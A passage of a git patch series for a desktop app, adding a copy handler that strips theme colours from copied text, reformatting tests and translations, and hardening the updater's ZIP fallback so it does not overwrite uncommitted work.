srgbChannelValue(srgb[3] ?? ''), + alpha: srgb[4] ? alphaValue(srgb[4]) : 1 + } + } + + if (HEX_RE.test(value)) { + const expanded = expandHex(value) + + if (expanded) { + return { r: expanded[0], g: expanded[1], b: expanded[2], alpha: expanded[3] } + } + } + + return null +} + +/** + * Perceived luma (0–255, ITU-R BT.601 weighting) of a CSS color, with alpha + * composited over mid-gray so partial opacity neither overstates nor hides + * the paint. Accepts the serialization forms Chromium computes for the app's + * tokens: rgb()/rgba(), color(srgb …) (the computed form of modern functions + * like color-mix()), and hex. Returns null for anything else (keywords, + * variables, non-sRGB spaces) or effectively invisible paint (alpha ≤ 0.05). + */ +export function textColorLuma(cssColor: string): number | null { + const parsed = parseCssColor(cssColor) + + if (!parsed || parsed.alpha <= 0.05) { + return null + } + + const composite = (channel: number) => channel * parsed.alpha + 128 * (1 - parsed.alpha) + + return 0.2126 * composite(parsed.r) + 0.7152 * composite(parsed.g) + 0.0722 * composite(parsed.b) +} + +function isOppositeScheme(textLuma: number, mode: RenderedMode): boolean { + return mode === 'dark' ? textLuma >= LIGHT_TEXT_LUMA_MIN : textLuma <= DARK_TEXT_LUMA_MAX +} + +function renderedMode(doc: Document): RenderedMode { + const attr = doc.documentElement.dataset.hermesMode + + if (attr === 'light' || attr === 'dark') { + return attr + } + + // Boot frame or a host that skipped theme application: fall back to the OS + // preference, which is what `system` mode resolves to anyway. + try { + return doc.defaultView?.matchMedia('(prefers-color-scheme: dark)').matches ? 'dark' : 'light' + } catch { + return 'light' + } +} + +function rangeContainsNode(range: Range, node: Node): boolean { + try { + return range.intersectsNode(node) + } catch { + // Environments without intersectsNode: fall back to a boundary compare. + try { + range.comparePoint(node, 0) + + return true + } catch { + return false + } + } +} + +/** + * Mean perceived luma of the ink that paints the current selection, read + * from the LIVE DOM: the computed color (preferring -webkit-text-fill-color + * when set) of each selected text node's parent. Returns null when the + * selection holds no scoreable ink. + */ +export function selectionInkLuma(sel: Selection, doc: Document): number | null { + const view = doc.defaultView + + if (!view) { + return null + } + + const lumas: number[] = [] + const seen = new Set() + + for (let i = 0; i < sel.rangeCount && lumas.length < MAX_PROBE_NODES; i++) { + const range = sel.getRangeAt(i) + const root = range.commonAncestorContainer + const walker = doc.createTreeWalker(root.nodeType === 1 ? root : root.parentElement ?? doc.body, NodeFilter.SHOW_TEXT) + + let node = walker.nextNode() + + while (node && lumas.length < MAX_PROBE_NODES) { + if (rangeContainsNode(range, node)) { + const el = node.parentElement + + if (el && !seen.has(el)) { + seen.add(el) + + const style = view.getComputedStyle(el) + const fill = style.getPropertyValue('-webkit-text-fill-color') + const ink = textColorLuma(fill) ?? textColorLuma(style.color) + + if (ink !== null) { + lumas.push(ink) + } + } + } + + node = walker.nextNode() + } + } + + if (lumas.length === 0) { + return null + } + + return lumas.reduce((sum, l) => sum + l, 0) / lumas.length +} + +/** + * Serialize the selection as tag-structured HTML with no paint and no + * app-internal attributes: semantic elements (p, strong, em, a, ul, pre, + * table, …) survive with their content and hrefs; style/class attributes — + * the only carriers of Hermes' palette — are dropped so the paste target's + * own color defaults apply. + * + * One exception to the strip-everything rule: the result carries a GENERIC + * font-family (`sans-serif`, `monospace` inside code). With no family at + * all, receivers that convert HTML to rich text (macOS Mail, Notes, + * TextEdit) fall back to the BROWSER default — Times — instead of their own + * compose font. Naming the generic family keeps the paste sans like the app + * renders it, while each platform resolves it to its own system face. + */ +export function serializeSelectionStructure(sel: Selection, doc: Document): string { + const container = doc.createElement('div') + + for (let i = 0; i < sel.rangeCount; i++) { + container.append(sel.getRangeAt(i).cloneContents()) + } + + for (const el of container.querySelectorAll('[style]')) { + el.removeAttribute('style') + } + + for (const el of container.querySelectorAll('[class]')) { + el.removeAttribute('class') + } + + const wrapper = doc.createElement('div') + + wrapper.style.fontFamily = 'sans-serif' + + while (container.firstChild) { + wrapper.append(container.firstChild) + } + + for (const el of wrapper.querySelectorAll('pre, code')) { + el.style.fontFamily = 'monospace' + } + + // outerHTML, not innerHTML: the styled wrapper IS the font anchor. + return wrapper.outerHTML +} + +function selectionStartsInEditable(sel: Selection): boolean { + const anchor = sel.anchorNode + + if (!anchor) { + return false + } + + const el = anchor.nodeType === 1 ? (anchor as Element) : anchor.parentElement + + return Boolean(el?.closest('input, textarea, [contenteditable="true"], [contenteditable=""]')) +} + +/** + * Install the document-level `copy` interceptor. Returns a dispose function. + * + * Runs in the CAPTURE phase so inner handlers cannot run first. Only an + * off-scheme selection is intercepted (payload owned and rewritten); every + * other copy — same-scheme, editable-field, empty — passes through to + * Chromium's default untouched. + */ +export function installSelectionCopyColorGuard(doc: Document = document): () => void { + const trace = (entry: Record) => { + if (import.meta.env.DEV) { + const view = doc.defaultView as (Window & { __copyGuardLog?: unknown[] }) | null + + if (view) { + ;(view.__copyGuardLog ??= []).push(entry) + } + } + } + + const onCopy = (event: ClipboardEvent) => { + const sel = doc.getSelection() + + if (!sel || sel.isCollapsed || sel.rangeCount === 0) { + return + } + + if (selectionStartsInEditable(sel)) { + trace({ step: 'editable-skip' }) + + return + } + + const mode = renderedMode(doc) + const inkLuma = selectionInkLuma(sel, doc) + + if (inkLuma === null || !isOppositeScheme(inkLuma, mode)) { + trace({ step: inkLuma === null ? 'no-ink' : 'same-scheme', inkLuma, mode }) + + return + } + + const clipboard = event.clipboardData + + if (!clipboard) { + return + } + + const plain = sel.toString() + const html = serializeSelectionStructure(sel, doc) + + // Owning the payload is the only way to change it: Chromium's own + // serialization is produced after handlers decline, and preventDefault + // is required for setData writes to stick. + event.preventDefault() + clipboard.setData('text/plain', plain) + clipboard.setData('text/html', html) + trace({ step: 'owned-payload', mode, inkLuma, plainChars: plain.length, htmlChars: html.length }) + } + + doc.addEventListener('copy', onCopy, true) + + return () => doc.removeEventListener('copy', onCopy, true) +} diff --git a/apps/desktop/src/main.tsx b/apps/desktop/src/main.tsx index 39e21ce743..3c2a116a6b 100644 --- a/apps/desktop/src/main.tsx +++ b/apps/desktop/src/main.tsx @@ -26,9 +26,14 @@ import { I18nProvider } from './i18n' import { installClipboardShim } from './lib/clipboard' import { queryClient } from './lib/query-client' import { installRendererAnimationPauseState } from './lib/renderer-loop-pause' +import { installSelectionCopyColorGuard } from './lib/selection-copy-colors' import { ThemeProvider } from './themes/context' installClipboardShim() +// Chromium serializes selection copies (Cmd+C, right-click Copy) with the +// theme's computed colors inlined; without this guard a dark-theme selection +// pastes as near-white text into light-background targets. +installSelectionCopyColorGuard() // The perf probe ships in dev, and in a production build ONLY when explicitly // opted in (VITE_PERF_PROBE=1) — this lets the perf harness measure a real, From 8286c46502e1f59eafdfabcf5af998024f64dfb8 Mon Sep 17 00:00:00 2001 From: "hermes-seaeye[bot]" <307254004+hermes-seaeye[bot]@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:31:35 +0000 Subject: [PATCH 105/161] fmt(js): `npm run fix` on merge (#92032) Co-authored-by: github-actions[bot] --- apps/desktop/electron/backend-health.test.ts | 7 ++--- .../electron/connection-config.test.ts | 30 ++++--------------- apps/desktop/electron/main.ts | 3 +- .../assistant-ui/thread/assistant-message.tsx | 7 ++++- apps/desktop/src/i18n/ar.ts | 3 +- apps/desktop/src/i18n/zh-hant.ts | 3 +- apps/desktop/src/i18n/zh.ts | 3 +- .../src/lib/selection-copy-colors.test.ts | 10 +++++-- apps/desktop/src/lib/selection-copy-colors.ts | 8 +++-- 9 files changed, 33 insertions(+), 41 deletions(-) diff --git a/apps/desktop/electron/backend-health.test.ts b/apps/desktop/electron/backend-health.test.ts index d1dd26815e..a23ba5a73b 100644 --- a/apps/desktop/electron/backend-health.test.ts +++ b/apps/desktop/electron/backend-health.test.ts @@ -372,7 +372,7 @@ test('isServerSideHttpError detects 502/503/504', () => { // Non-HTTP errors (timeouts, network failures) don't match the pattern assert.equal(isServerSideHttpError(new Error('connect ECONNREFUSED')), null) assert.equal(isServerSideHttpError(null), null) - assert.equal(isServerSideHttpError('503: something'), null) // not an Error + assert.equal(isServerSideHttpError('503: something'), null) // not an Error }) test('isNousCloudAgentUrl detects cloud agent hosts', () => { @@ -504,10 +504,7 @@ test('makeNousCloudBackendDownError produces the Cloud shape and preserves cause test('makeNousCloudBackendDownError returns null for a Cloud 401 (routes to reauth)', () => { const err = new Error('Unauthorized') as any err.statusCode = 401 - assert.equal( - makeNousCloudBackendDownError('https://ares-3009.agents.nousresearch.com', err), - null - ) + assert.equal(makeNousCloudBackendDownError('https://ares-3009.agents.nousresearch.com', err), null) }) test('makeNousCloudBackendDownError returns null for a non-Cloud 503 (generic remote failure)', () => { diff --git a/apps/desktop/electron/connection-config.test.ts b/apps/desktop/electron/connection-config.test.ts index b547889797..36a042c6d3 100644 --- a/apps/desktop/electron/connection-config.test.ts +++ b/apps/desktop/electron/connection-config.test.ts @@ -1173,11 +1173,7 @@ test('gatewayTicketFailure preserves a structured 503 statusCode as a transport const source = new Error('upstream unavailable') as any source.statusCode = 503 - const wrapped = gatewayTicketFailure( - source, - 'auth message', - 'transport message' - ) + const wrapped = gatewayTicketFailure(source, 'auth message', 'transport message') assert.equal(wrapped.message, 'transport message') assert.equal((wrapped as any).statusCode, 503) @@ -1190,11 +1186,7 @@ test('gatewayTicketFailure keeps 401 and 403 as reauth with needsOauthLogin', () const source = new Error(`HTTP ${code}`) as any source.statusCode = code - const wrapped = gatewayTicketFailure( - source, - 'auth message', - 'transport message' - ) + const wrapped = gatewayTicketFailure(source, 'auth message', 'transport message') assert.equal(wrapped.message, 'auth message') assert.equal((wrapped as any).needsOauthLogin, true) @@ -1209,11 +1201,7 @@ test('gatewayTicketFailure only copies an integer statusCode, not a message pref // boundary. The wrapper must not invent an integer from the message. const source = new Error('503: Service Unavailable') as any - const wrapped = gatewayTicketFailure( - source, - 'auth message', - 'transport message' - ) + const wrapped = gatewayTicketFailure(source, 'auth message', 'transport message') assert.equal((wrapped as any).statusCode, undefined) assert.equal((wrapped as any).needsOauthLogin, undefined) @@ -1241,11 +1229,7 @@ test('OAuth ticket-mint 503 surfaces the Cloud-down error (startup boundary)', ( return } - const wrapped = gatewayTicketFailure( - ticketErr, - 'auth', - 'transport' - ) + const wrapped = gatewayTicketFailure(ticketErr, 'auth', 'transport') assert.fail(`expected Cloud-down classification, got wrapper: ${wrapped.message}`) }) @@ -1258,11 +1242,7 @@ test('OAuth ticket-mint 401 stays on the reauth path (never Cloud-down)', () => const cloudError = makeNousCloudBackendDownError(baseUrl, ticketErr) assert.equal(cloudError, null, 'a 401 must not become a Cloud-down error') - const wrapped = gatewayTicketFailure( - ticketErr, - 'auth message', - 'transport message' - ) + const wrapped = gatewayTicketFailure(ticketErr, 'auth message', 'transport message') assert.equal(wrapped.message, 'auth message') assert.equal((wrapped as any).needsOauthLogin, true) diff --git a/apps/desktop/electron/main.ts b/apps/desktop/electron/main.ts index c7b3025bf6..e3087bdcb9 100644 --- a/apps/desktop/electron/main.ts +++ b/apps/desktop/electron/main.ts @@ -10911,8 +10911,7 @@ async function startHermes() { // boundary when present, so the renderer overlay can key on it rather than // re-classifying the message string. main owns classification; the renderer // only consumes the structured result (#85335). - const isCloudBackendDown = - Boolean(error && typeof error === 'object' && (error as any).isCloudBackendDown === true) + const isCloudBackendDown = Boolean(error && typeof error === 'object' && (error as any).isCloudBackendDown === true) const statusCode = Number( error && typeof error === 'object' && Number.isInteger((error as any).statusCode) diff --git a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx index e13be5488c..84bc87c475 100644 --- a/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx +++ b/apps/desktop/src/components/assistant-ui/thread/assistant-message.tsx @@ -554,7 +554,12 @@ const ErrorRecoveryActions: FC = () => { {remoteConnection ? copy.errorOpenDesktopLogs : copy.errorOpenLogs} )} - +
    ) } diff --git a/apps/desktop/src/i18n/ar.ts b/apps/desktop/src/i18n/ar.ts index e029b9f1bf..a30db33914 100644 --- a/apps/desktop/src/i18n/ar.ts +++ b/apps/desktop/src/i18n/ar.ts @@ -86,7 +86,8 @@ export const ar = defineLocale({ repairInstall: 'إصلاح التثبيت', useLocalGateway: 'استخدام البوابة المحلية', cloudDownTitle: 'عامل Nous Cloud معطّل', - cloudDownDescription: 'يعيد عامل السحابة المُدار من Nous الذي يتصل به هذا البوابة خطأً من الخادم. لا يمكن إعادة تشغيله من هنا — تحقق من حالته، أو بدّل إلى البوابة المحلية، أو احصل على الدعم.', + cloudDownDescription: + 'يعيد عامل السحابة المُدار من Nous الذي يتصل به هذا البوابة خطأً من الخادم. لا يمكن إعادة تشغيله من هنا — تحقق من حالته، أو بدّل إلى البوابة المحلية، أو احصل على الدعم.', cloudDownHint: 'تفتح الأزرار أدناه بوابة Nous (حالة المثيل وعناصر التحكم) أو Discord للحصول على الدعم.', cloudDownCheckPortal: 'التحقق من حالة البوابة', cloudDownDiscord: 'الحصول على مساعدة عبر Discord', diff --git a/apps/desktop/src/i18n/zh-hant.ts b/apps/desktop/src/i18n/zh-hant.ts index 9178997e1e..593ab6bdb4 100644 --- a/apps/desktop/src/i18n/zh-hant.ts +++ b/apps/desktop/src/i18n/zh-hant.ts @@ -101,7 +101,8 @@ export const zhHant = defineLocale({ signOutAndSignIn: '登出並重新登入', remoteFailureHint: '在「閘道設定」中檢查閘道 URL 與登入,或切換至本機閘道。', cloudDownTitle: 'Nous Cloud 代理已停機', - cloudDownDescription: '此閘道連線的 Nous 託管雲端代理正在回傳伺服器錯誤。無法在此處重新啟動——請檢查其狀態、切換至本機閘道,或取得支援。', + cloudDownDescription: + '此閘道連線的 Nous 託管雲端代理正在回傳伺服器錯誤。無法在此處重新啟動——請檢查其狀態、切換至本機閘道,或取得支援。', cloudDownHint: '使用下方按鈕開啟 Nous Portal(檢視執行個體狀態與操作)或加入 Discord 取得支援。', cloudDownCheckPortal: '查看 Portal 狀態', cloudDownDiscord: '在 Discord 取得協助', diff --git a/apps/desktop/src/i18n/zh.ts b/apps/desktop/src/i18n/zh.ts index 5423d13af8..4fa78ec6a0 100644 --- a/apps/desktop/src/i18n/zh.ts +++ b/apps/desktop/src/i18n/zh.ts @@ -101,7 +101,8 @@ export const zh: Translations = { signOutAndSignIn: '退出并重新登录', remoteFailureHint: '在“网关设置”中检查网关 URL 和登录,或切换到本地网关。', cloudDownTitle: 'Nous Cloud 代理已宕机', - cloudDownDescription: '此网关连接的 Nous 托管云代理正在返回服务器错误。无法在此处重启——请检查其状态、切换到本地网关或获取支持。', + cloudDownDescription: + '此网关连接的 Nous 托管云代理正在返回服务器错误。无法在此处重启——请检查其状态、切换到本地网关或获取支持。', cloudDownHint: '使用下方按钮打开 Nous Portal(查看实例状态与操作)或加入 Discord 获取支持。', cloudDownCheckPortal: '查看 Portal 状态', cloudDownDiscord: '在 Discord 获取帮助', diff --git a/apps/desktop/src/lib/selection-copy-colors.test.ts b/apps/desktop/src/lib/selection-copy-colors.test.ts index 54e3d4f3f1..a7ceab5e2e 100644 --- a/apps/desktop/src/lib/selection-copy-colors.test.ts +++ b/apps/desktop/src/lib/selection-copy-colors.test.ts @@ -7,7 +7,11 @@ import { textColorLuma } from './selection-copy-colors' -function makeCopyEvent(): { event: ClipboardEvent; setData: ReturnType; preventDefault: ReturnType } { +function makeCopyEvent(): { + event: ClipboardEvent + setData: ReturnType + preventDefault: ReturnType +} { const event = new Event('copy', { bubbles: true, cancelable: true }) as ClipboardEvent const setData = vi.fn() const preventDefault = vi.fn() @@ -160,7 +164,9 @@ describe('serializeSelectionStructure', () => { }) it('anchors a generic sans family so rich-text receivers keep their own font', () => { - const host = armSelection('

    plain prose

    ') + const host = armSelection( + '

    plain prose

    ' + ) const html = serializeSelectionStructure(window.getSelection()!, document) // Generic family on the wrapper: resolves to each platform's own face, diff --git a/apps/desktop/src/lib/selection-copy-colors.ts b/apps/desktop/src/lib/selection-copy-colors.ts index de9d63b9a4..944c4073ed 100644 --- a/apps/desktop/src/lib/selection-copy-colors.ts +++ b/apps/desktop/src/lib/selection-copy-colors.ts @@ -43,8 +43,7 @@ const srgbChannelValue = (raw: string): number => { return v.endsWith('%') ? (Number.parseFloat(v) / 100) * 255 : Number.parseFloat(v) * 255 } -const alphaValue = (raw: string): number => - raw.endsWith('%') ? Number.parseFloat(raw) / 100 : Number.parseFloat(raw) +const alphaValue = (raw: string): number => (raw.endsWith('%') ? Number.parseFloat(raw) / 100 : Number.parseFloat(raw)) function expandHex(hex: string): [number, number, number, number] | null { const h = hex.slice(1) @@ -175,7 +174,10 @@ export function selectionInkLuma(sel: Selection, doc: Document): number | null { for (let i = 0; i < sel.rangeCount && lumas.length < MAX_PROBE_NODES; i++) { const range = sel.getRangeAt(i) const root = range.commonAncestorContainer - const walker = doc.createTreeWalker(root.nodeType === 1 ? root : root.parentElement ?? doc.body, NodeFilter.SHOW_TEXT) + const walker = doc.createTreeWalker( + root.nodeType === 1 ? root : (root.parentElement ?? doc.body), + NodeFilter.SHOW_TEXT + ) let node = walker.nextNode() From fc7523ca31eeb6eff9114afe384c2cf6380359df Mon Sep 17 00:00:00 2001 From: "hermes-seaeye[bot]" <307254004+hermes-seaeye[bot]@users.noreply.github.com> Date: Sat, 22 Aug 2026 03:38:21 +0000 Subject: [PATCH 106/161] fmt(js): `npm run fix` on merge (#92034) Co-authored-by: github-actions[bot] --- apps/desktop/src/lib/selection-copy-colors.test.ts | 1 + apps/desktop/src/lib/selection-copy-colors.ts | 1 + 2 files changed, 2 insertions(+) diff --git a/apps/desktop/src/lib/selection-copy-colors.test.ts b/apps/desktop/src/lib/selection-copy-colors.test.ts index a7ceab5e2e..4faca83f91 100644 --- a/apps/desktop/src/lib/selection-copy-colors.test.ts +++ b/apps/desktop/src/lib/selection-copy-colors.test.ts @@ -167,6 +167,7 @@ describe('serializeSelectionStructure', () => { const host = armSelection( '

    plain prose

    ' ) + const html = serializeSelectionStructure(window.getSelection()!, document) // Generic family on the wrapper: resolves to each platform's own face, diff --git a/apps/desktop/src/lib/selection-copy-colors.ts b/apps/desktop/src/lib/selection-copy-colors.ts index 944c4073ed..13a303b9d2 100644 --- a/apps/desktop/src/lib/selection-copy-colors.ts +++ b/apps/desktop/src/lib/selection-copy-colors.ts @@ -174,6 +174,7 @@ export function selectionInkLuma(sel: Selection, doc: Document): number | null { for (let i = 0; i < sel.rangeCount && lumas.length < MAX_PROBE_NODES; i++) { const range = sel.getRangeAt(i) const root = range.commonAncestorContainer + const walker = doc.createTreeWalker( root.nodeType === 1 ? root : (root.parentElement ?? doc.body), NodeFilter.SHOW_TEXT From eac3f645efe73ac294e0fed0d427c1aa07eb951d Mon Sep 17 00:00:00 2001 From: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Date: Fri, 21 Aug 2026 19:36:18 -0700 Subject: [PATCH 107/161] fix(update): don't ZIP-fallback on dependency failures or dirty trees MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Surgical reapply of PR #87878 (@kshitijk4poor's salvage of #87327 by @liruixinch) onto current main — the receipt-boundary and summary changes from this session made the original commits conflict. - ZIP fallback now keys on git ACTUALLY having failed (_should_zip_fallback_on_update_error): a dependency-install failure after a successful pull can't be fixed by re-downloading source and would clobber the tree (#87331 cascade trigger, #87304). - _abort_zip_update_if_dirty_tree: refuse to overlay a dirty checkout (-uall so user gitconfig can't blind the guard) + pre-swap TOCTOU re-check with our own staging artifacts filtered (#91962, #87304). - Failure-stage naming (_format_update_failure_stage) + stderr tail so 'Git update failed' stops mislabeling pip/uv failures. - Receipt finalize preserved on the no-fallback failure path. Co-authored-by: kshitijk4poor <82637225+kshitijk4poor@users.noreply.github.com> Co-authored-by: liruixinch --- hermes_cli/update_cmd.py | 198 +++++++++++++- .../test_update_zip_fallback_guards.py | 249 ++++++++++++++++++ .../test_update_zip_symlink_reject.py | 6 + 3 files changed, 450 insertions(+), 3 deletions(-) create mode 100644 tests/hermes_cli/test_update_zip_fallback_guards.py diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index 1144400025..64cdb9b377 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -1158,6 +1158,166 @@ def _print_update_completion(message: str) -> None: print(f"=== hermes-update completed {action_id} ===") +def _called_process_error_cmd_parts(exc: subprocess.CalledProcessError) -> list[str]: + """Normalize ``CalledProcessError.cmd`` into argv-style tokens.""" + cmd = exc.cmd + if cmd is None: + return [] + if isinstance(cmd, (str, bytes)): + text = cmd.decode("utf-8", "replace") if isinstance(cmd, bytes) else cmd + try: + return shlex.split(text, posix=os.name != "nt") + except ValueError: + return text.split() + return [str(part) for part in cmd] + + +def _called_process_error_is_git(exc: subprocess.CalledProcessError) -> bool: + """True when the failed subprocess was git itself.""" + parts = _called_process_error_cmd_parts(exc) + if not parts: + return False + # Windows argv may use backslashes; basename() on POSIX would otherwise + # keep the whole path. Normalize separators before taking the name. + name = os.path.basename(parts[0].replace("\\", "/")).lower() + return name in {"git", "git.exe"} + + +def _called_process_error_is_python_dep_install( + exc: subprocess.CalledProcessError, +) -> bool: + """True when the failed subprocess was a uv/pip (or ensurepip) install.""" + parts = [part.lower() for part in _called_process_error_cmd_parts(exc)] + if not parts: + return False + exe = os.path.basename(parts[0].replace("\\", "/")) + if "ensurepip" in parts: + return True + if "install" in parts and ( + "pip" in parts or exe in {"pip", "pip.exe", "pip3", "pip3.exe", "uv", "uv.exe"} + ): + return True + return False + + +def _format_update_failure_stage(exc: subprocess.CalledProcessError) -> str: + """Name the update stage that actually failed. + + The git pull and the Python-dependency install share one ``try`` in + ``_cmd_update_impl``. Calling every ``CalledProcessError`` a git failure + (the historical Windows message) sent users hunting in the wrong place + and, worse, keyed the ZIP overlay on exception *type* rather than on git + actually having failed (#87304, #85840). + """ + if _called_process_error_is_python_dep_install(exc): + return "Python dependency install failed" + if _called_process_error_is_git(exc): + return "Git update failed" + return "Update step failed" + + +def _should_zip_fallback_on_update_error(exc: BaseException) -> bool: + """ZIP fallback is for Windows git file-I/O breakage, not later stages. + + A dependency-install failure (locked ``hermes.exe`` / ``uv pip install`` + exit 2) is not a git failure. The pull has already succeeded by then, so + re-downloading the source ZIP cannot fix the install and would replace + every top-level entry except ``venv`` / ``node_modules`` / ``.git`` / + ``.env`` — permanently deleting uncommitted edits and untracked files. + """ + return ( + isinstance(exc, subprocess.CalledProcessError) + and _m()._is_windows() + and _called_process_error_is_git(exc) + ) + + +def _print_called_process_error_tail( + exc: subprocess.CalledProcessError, *, limit: int = 12 +) -> None: + """Print a captured stderr/stdout tail when the failing call recorded one.""" + blob = exc.stderr or exc.stdout or "" + if isinstance(blob, bytes): + blob = blob.decode("utf-8", "replace") + lines = [line for line in str(blob).splitlines() if line.strip()] + if not lines: + return + print(" Last output:") + for line in lines[-limit:]: + print(f" {line}") + + +def _zip_overlay_block_reason( + root: Path, *, ignore_staging_artifacts: bool = False +) -> Optional[str]: + """Why overlaying a ZIP onto ``root`` would destroy work, or None if safe. + + The ZIP path swaps every top-level entry (except a tiny preserve set) and + then deletes the backups, so uncommitted edits and untracked files under + a replaced directory are gone. Fail closed when git status cannot run: + unknown dirtiness is not a license to clobber the tree (#87304). + + ``ignore_staging_artifacts`` is for the pre-swap re-check: phase 1 of the + two-phase replace creates ``*.hermes-update-staging`` siblings inside the + checkout, which git reports as untracked. Those are our own artifacts, + not user work — without the filter the re-check would always refuse. + """ + if not (root / ".git").exists(): + return None + git_cmd = ["git"] + if sys.platform == "win32": + git_cmd = ["git", "-c", "windows.appendAtomically=false"] + result = subprocess.run( + # -uall: a user-level ``status.showUntrackedFiles = no`` git config + # would otherwise hide untracked files and silently blind this guard. + git_cmd + ["status", "--porcelain", "--untracked-files=all"], + cwd=root, + capture_output=True, + text=True, + encoding="utf-8", + errors="replace", + ) + if result.returncode != 0: + detail = (result.stderr or result.stdout or "").strip().splitlines() + suffix = f" ({detail[0]})" if detail else "" + return f"could not check the working tree{suffix}" + lines = [line for line in (result.stdout or "").splitlines() if line.strip()] + if ignore_staging_artifacts: + lines = [ + line for line in lines if not _is_zip_staging_artifact_status_line(line) + ] + if lines: + return "the working tree has uncommitted changes or untracked files" + return None + + +_ZIP_STAGING_ARTIFACT_SUFFIXES = (".hermes-update-staging", ".hermes-update-old") + + +def _is_zip_staging_artifact_status_line(line: str) -> bool: + """True when a porcelain status line is our own two-phase-swap artifact.""" + payload = line[3:] if len(line) >= 3 else line + top_level = ( + payload.strip().strip('"').replace("\\", "/").rstrip("/").split("/", 1)[0] + ) + return top_level.endswith(_ZIP_STAGING_ARTIFACT_SUFFIXES) + + +def _abort_zip_update_if_dirty_tree() -> None: + """Refuse to overlay a ZIP onto a dirty git checkout (#87304).""" + reason = _zip_overlay_block_reason(_m().PROJECT_ROOT) + if reason is None: + return + print(f"✗ ZIP fallback refused: {reason}.") + print( + " Overlaying the ZIP would overwrite uncommitted edits and permanently " + "delete untracked files." + ) + print(" Stash or commit your changes, then rerun `hermes update`.") + print(" To inspect: git status --porcelain") + _m().sys.exit(1) + + def _read_project_version() -> str | None: """Read the ``version`` field from the checkout's pyproject.toml. @@ -1268,6 +1428,7 @@ def _update_via_zip(args, *, had_desktop_app_before_update: bool = False) -> boo f"--branch {branch}`, or update against main with `hermes update`." ) _m().sys.exit(1) + _abort_zip_update_if_dirty_tree() zip_url = ( f"https://github.com/NousResearch/hermes-agent/archive/refs/heads/{branch}.zip" ) @@ -1368,6 +1529,23 @@ def _update_via_zip(args, *, had_desktop_app_before_update: bool = False) -> boo raise try: + # Re-check the tree right before the swap (#87304 TOCTOU): the + # download + extract + staging window above can take minutes, and + # work created in it would be destroyed by the commit below. Our + # own phase-1 staging siblings are filtered out — they are the + # expected artifacts of getting here, not user work. + recheck_reason = _zip_overlay_block_reason( + _m().PROJECT_ROOT, ignore_staging_artifacts=True + ) + if recheck_reason is not None: + _discard_staged(staged) + print(f"✗ ZIP fallback aborted before the swap: {recheck_reason}.") + print( + " Files appeared in the checkout while the update was " + "downloading; committing the swap would delete them." + ) + print(" Stash or commit your changes, then rerun `hermes update`.") + _m().sys.exit(1) _commit_staged_replacements(staged) except Exception: # The rollback already restored every swapped entry, but staging @@ -7786,8 +7964,9 @@ def _cmd_update_impl(args, gateway_mode: bool): sys.exit(1) except subprocess.CalledProcessError as e: - if _m()._is_windows(): - print(f"⚠ Git update failed: {e}") + stage = _format_update_failure_stage(e) + if _should_zip_fallback_on_update_error(e): + print(f"⚠ {stage}: {e}") print("→ Falling back to ZIP download...") print() desktop_build_ok = _update_via_zip( @@ -7797,7 +7976,20 @@ def _cmd_update_impl(args, gateway_mode: bool): if gateway_mode: _write_gateway_update_exit_code(desktop_build_ok) else: - print(f"✗ Update failed: {e}") + print(f"✗ {stage}: {e}") + _print_called_process_error_tail(e) + if _called_process_error_is_python_dep_install(e): + print( + " The git update already finished. Re-downloading the source " + "ZIP cannot fix a dependency install error and would overwrite " + "local files." + ) + if _m()._is_windows(): + print(" Retry through the venv interpreter:") + print( + ' venv\\Scripts\\python.exe -c ' + '"from hermes_cli.main import main; main()" update --yes' + ) try: from hermes_cli.update_receipt import finalize_update_receipt diff --git a/tests/hermes_cli/test_update_zip_fallback_guards.py b/tests/hermes_cli/test_update_zip_fallback_guards.py new file mode 100644 index 0000000000..8b6bc426f7 --- /dev/null +++ b/tests/hermes_cli/test_update_zip_fallback_guards.py @@ -0,0 +1,249 @@ +"""ZIP fallback must not fire on dependency failures or clobber a dirty tree. + +Issue #87304: on Windows the update ``try`` spans git pull *and* ``uv pip +install``. A locked ``hermes.exe`` makes the install exit 2, the handler +prints ``Git update failed``, and ``_update_via_zip`` replaces every +top-level entry except ``venv`` / ``node_modules`` / ``.git`` / ``.env`` — +permanently deleting uncommitted edits and untracked files. The git pull +has already succeeded by then, so the ZIP cannot fix the actual failure. +""" + +from __future__ import annotations + +import subprocess +from types import SimpleNamespace +from unittest.mock import patch + +import pytest + +from hermes_cli import main as hermes_main +from hermes_cli import update_cmd + + +def _cpe(cmd, returncode=2, stderr="", stdout="") -> subprocess.CalledProcessError: + exc = subprocess.CalledProcessError(returncode, cmd) + exc.stderr = stderr + exc.stdout = stdout + return exc + + +# --------------------------------------------------------------------------- +# Stage classification + ZIP gating +# --------------------------------------------------------------------------- + + +def test_uv_pip_install_is_a_dependency_failure_not_git(): + exc = _cpe([r"C:\venv\Scripts\uv.exe", "pip", "install", "-e", "."]) + assert update_cmd._called_process_error_is_git(exc) is False + assert update_cmd._called_process_error_is_python_dep_install(exc) is True + assert update_cmd._format_update_failure_stage(exc) == ( + "Python dependency install failed" + ) + + +def test_venv_pip_install_is_a_dependency_failure(): + exc = _cpe([r"C:\venv\Scripts\python.exe", "-m", "pip", "install", "-e", "."]) + assert update_cmd._called_process_error_is_python_dep_install(exc) is True + assert update_cmd._called_process_error_is_git(exc) is False + + +def test_ensurepip_is_a_dependency_failure(): + exc = _cpe([r"C:\venv\Scripts\python.exe", "-m", "ensurepip", "--upgrade"]) + assert update_cmd._called_process_error_is_python_dep_install(exc) is True + assert update_cmd._format_update_failure_stage(exc) == ( + "Python dependency install failed" + ) + + +def test_git_pull_is_classified_as_git(): + exc = _cpe(["git", "-c", "windows.appendAtomically=false", "pull"], returncode=1) + assert update_cmd._called_process_error_is_git(exc) is True + assert update_cmd._called_process_error_is_python_dep_install(exc) is False + assert update_cmd._format_update_failure_stage(exc) == "Git update failed" + + +def test_git_exe_path_is_still_git(): + exc = _cpe([r"C:\Program Files\Git\cmd\git.exe", "fetch", "origin", "main"]) + assert update_cmd._called_process_error_is_git(exc) is True + + +def test_unknown_command_gets_generic_stage(): + exc = _cpe(["npm", "install"], returncode=1) + assert update_cmd._format_update_failure_stage(exc) 